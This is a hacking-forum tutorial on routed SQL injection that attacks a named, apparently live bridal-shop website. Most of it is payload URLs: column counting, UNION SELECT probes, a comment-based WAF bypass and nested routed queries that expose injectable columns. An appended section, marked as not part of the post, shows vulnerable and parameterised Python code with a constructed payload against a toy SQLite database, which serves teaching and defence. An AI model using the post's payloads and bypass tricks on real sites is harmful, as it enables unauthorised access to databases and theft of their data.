    [New] Routed query based SQL-injection tutorial - by spirit [/noob friendly]



    hello provendorz members


    so, today i am here to demonstrate a tutorial on routed query based sql-injection

    php code:
    target website:-www.impressionbridal.com/catalog.php?cat=22 


    so, let's try to inject it

    php code:
    http://www.impressionbridal.com/catalog.php?cat=22' [error] 

    let's try to balance our query
    php code:
    http://www.impressionbridal.com/catalog.php?cat=22'-- - 

    great, now let's try to find the total number of columns.
    php code:
    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+1-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+2-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+3-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+4-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=22'+order+by+6-- - [error] 

    so, there are 5 columns; now let's try to find the vulnerable one with our union select command.



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+u nion+s elect+1,2,3,4,5-- -  [waf detected] 
    so, a waf; let's bypass it. check this thread of mine
    ==>
    some basics ways to bypass waf
    <==



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+1,2,3,4,5-- -  [waf bypassed] 
    waf bypassed, great.
    check this thread of mine first.


    ==>
    [tutorial]sql-injection::new way to get vulnerable column by brute forcing columns
    <==

    nothing works, sad. let's try routed based injection

    after column 1, try to make the query false with a single quote " ' " again.



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+1',2,3,4,5-- - [error] 
    so now we got the error, so let's try routed query based injection

    now suppose that 1 is your new parameter; for balancing we will put 1 inside double quotes like this: "1", and then balance our query with -- - or anything

    let's try it



    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' -- - [doublequote],2,3,4,5-- - [no-error] 
    here hf is blocking the double quote ", so i wrote [doublequote]

    so, let's find the total number of columns using the order by clause
    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 1-- - [doublequote],2,3,4,5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 17 -- - [doublequote],2,3,4,5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 ' order by 18 -- - [doublequote],2,3,4,5-- - [no-error]

    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] 1 'order by 19 -- - [doublequote],2,3,4,5-- - [error] 


    this means there are 18 columns; now let's use our union select statement.

    ps: the waf is here also.
    php code:
    http://www.impressionbridal.com/catalog.php?cat=.22'+/*!12345u nion*/+s elect+[doublequote] .1 '+/*!12345u nion*/+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- - [doublequote],2,3,4,5-- - [no-error] 


    so, columns 12,13,14 are vulnerable


    let's try to use our simple dios



    Last edited by The Master; at .
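
The server-side pattern that makes a "routed" query possible, next to its fix, as an added example that is not part of the original post: the value returned by a first query is concatenated into a second one. The schema, the function names and the sample input are constructed assumptions, run against an in-memory SQLite database.

```python
import sqlite3

def make_db():
    """Constructed sample schema; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE categories(id TEXT, style_code TEXT);
        CREATE TABLE dresses(style_code TEXT, name TEXT, price TEXT);
        CREATE TABLE admins(login TEXT, pw_hash TEXT);
        INSERT INTO categories VALUES ('22', 'BR-A');
        INSERT INTO dresses VALUES ('BR-A', 'Sample gown', '900');
        INSERT INTO admins VALUES ('admin', 'CONSTRUCTED-HASH');
    """)
    return db

def catalog_vulnerable(db, cat):
    # Stage 1: request parameter concatenated into SQL.
    row = db.execute(
        f"SELECT style_code FROM categories WHERE id = '{cat}'").fetchone()
    if row is None:
        return []
    # Stage 2: the value returned by stage 1 is concatenated again ("routed").
    # Only this query's rows reach the page, which is why the post counts
    # columns a second time inside the quoted value.
    return db.execute(
        f"SELECT name, price FROM dresses WHERE style_code = '{row[0]}'").fetchall()

def catalog_hardened(db, cat):
    # Bind the parameter in both stages: a value read back from the database
    # is still untrusted when it is used to build the next statement.
    row = db.execute(
        "SELECT style_code FROM categories WHERE id = ?", (cat,)).fetchone()
    if row is None:
        return []
    return db.execute(
        "SELECT name, price FROM dresses WHERE style_code = ?", (row[0],)).fetchall()

# Constructed input for the toy schema above: the outer UNION makes stage 1
# return a string that is itself SQL for stage 2.
INNER = "z' UNION SELECT login, pw_hash FROM admins-- "
ROUTED_INPUT = "x' UNION SELECT '" + INNER.replace("'", "''") + "' -- "

if __name__ == "__main__":
    db = make_db()
    print(catalog_vulnerable(db, "22"))          # normal catalog row
    print(catalog_vulnerable(db, ROUTED_INPUT))  # row from admins leaks
    print(catalog_hardened(db, ROUTED_INPUT))    # []: input matched as data
```

Binding only the first query is not enough: if a stored `style_code` ever holds hostile text, the concatenated second stage is still injectable, while the bound version treats it as a plain string.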
